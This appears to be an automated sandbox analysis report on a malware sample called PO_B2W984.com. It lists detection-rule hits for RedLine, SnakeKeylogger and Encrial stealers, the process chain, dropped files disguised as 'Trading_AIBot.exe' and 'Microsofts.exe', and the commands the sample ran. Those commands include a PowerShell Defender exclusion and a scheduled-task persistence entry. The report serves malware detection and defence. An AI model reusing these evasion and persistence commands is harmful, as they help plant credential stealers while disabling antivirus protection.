Source: PO_B2W984.com | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: 4.1.rpkhzpuO.pif.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 15.2.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 15.1.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 19.1.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 4.1.rpkhzpuO.pif.400000.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 19.1.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 15.1.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 15.2.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 19.2.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 6.0.Microsofts.exe.800000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.0.Microsofts.exe.800000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 19.2.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000013.00000002.23176421665.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000F.00000002.23100866629.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000F.00000001.23060773301.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000013.00000001.23140173632.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: Process Memory Space: Microsofts.exe PID: 4824, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Microsofts.exe.4.dr, UltraSpeed.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: Microsofts.exe.4.dr, COVIDPickers.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 4.3.rpkhzpuO.pif.2761c6f8.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 4.3.rpkhzpuO.pif.2761c6f8.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 4.3.rpkhzpuO.pif.2761c6f8.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 15.2.rpkhzpuO.pif.2d5d4e5e.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 15.2.rpkhzpuO.pif.2d5d4e5e.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 15.2.rpkhzpuO.pif.2d5d4e5e.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 15.3.rpkhzpuO.pif.2b733e10.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 15.3.rpkhzpuO.pif.2b733e10.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 15.3.rpkhzpuO.pif.2b733e10.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
Source: PO_B2W984.com, Oupzhkpr.PIF.0.dr | Binary or memory string: oW.Sln
Source: classification engine | Classification label: mal100.troj.spyw.evad.winCOM@33/17@4/3
Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DD7F54 GetDiskFreeSpaceA
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 4_1_004019F0 OleInitialize,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,SizeofResource,FreeResource,SizeofResource,LoadLibraryA,GetProcAddress,#8,#8,#8,#15,#23,#24,#16,#411,#9,#9,#9
Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DE6D48 CoCreateInstance
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 4_1_004019F0 OleInitialize,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,SizeofResource,FreeResource,SizeofResource,LoadLibraryA,GetProcAddress,#8,#8,#8,#15,#23,#24,#16,#411,#9,#9,#9
Source: C:\Users\user\Desktop\PO_B2W984.com | File created: C:\Users\Public\OupzhkprF.cmd
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4104:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:816:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Phoenix_Clipper_666
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4260:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5880:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6236:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4104:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5880:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4260:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:816:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6236:120:WilError_03
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | File created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Command line argument: 08A (4_1_00413780)
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Command line argument: 08A (15_2_00413780)
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Command line argument: 08A (15_2_00413780)
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Command line argument: 08A (15_1_00413780)
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Command line argument: 08A (19_2_00413780)
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Command line argument: 08A (19_2_00413780)
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Command line argument: 08A (19_1_00413780)
Source: C:\Users\user\Desktop\PO_B2W984.com | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\PO_B2W984.com | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\PO_B2W984.com | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002D36000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000002.24180228176.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000002.24191123588.0000000003C90000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: PO_B2W984.com | ReversingLabs: Detection: 27%
Source: PO_B2W984.com | Virustotal: Detection: 36%
Source: C:\Users\user\Desktop\PO_B2W984.com | File read: C:\Users\user\Desktop\PO_B2W984.com
Source: unknown | Process created: C:\Users\user\Desktop\PO_B2W984.com "C:\Users\user\Desktop\PO_B2W984.com"
Source: C:\Users\user\Desktop\PO_B2W984.com | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO_B2W984.com | Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Process created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe"
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 20:52 /du 23:59 /sc daily /ri 1 /f
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown | Process created: C:\Users\Public\Libraries\Oupzhkpr.PIF "C:\Users\Public\Libraries\Oupzhkpr.PIF"
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
Source: unknown | Process created: C:\Users\Public\Libraries\Oupzhkpr.PIF "C:\Users\Public\Libraries\Oupzhkpr.PIF"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
Source: C:\Users\user\Desktop\PO_B2W984.com | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Users\user\Desktop\PO_B2W984.com | Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Process created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe"
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 20:52 /du 23:59 /sc daily /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
Source: C:\Users\user\Desktop\PO_B2W984.com | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\PO_B2W984.com | Section loaded: version.dll
Source: C:\Users\user\Desktop\PO_B2W984.com | Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\PO_B2W984.com | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\PO_B2W984.com | Section loaded: url.dll
Source: C:\Users\user\Desktop\PO_B2W984.com | Section loaded: ieframe.dll
Source: C:\Users\user\Desktop\PO_B2W984.com | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\PO_B2W984.com | Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\PO_B2W984.com | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\PO_B2W984.com | Section loaded: winhttp.dll
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: wkscli.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: smartscreenps.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ieproxy.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ieproxy.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ieproxy.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: mssip32.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: mssip32.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: mssip32.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: winhttpcom.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: webio.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ??????????.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ??.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ???.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ???.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ???.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ??l.dllJump to behavior
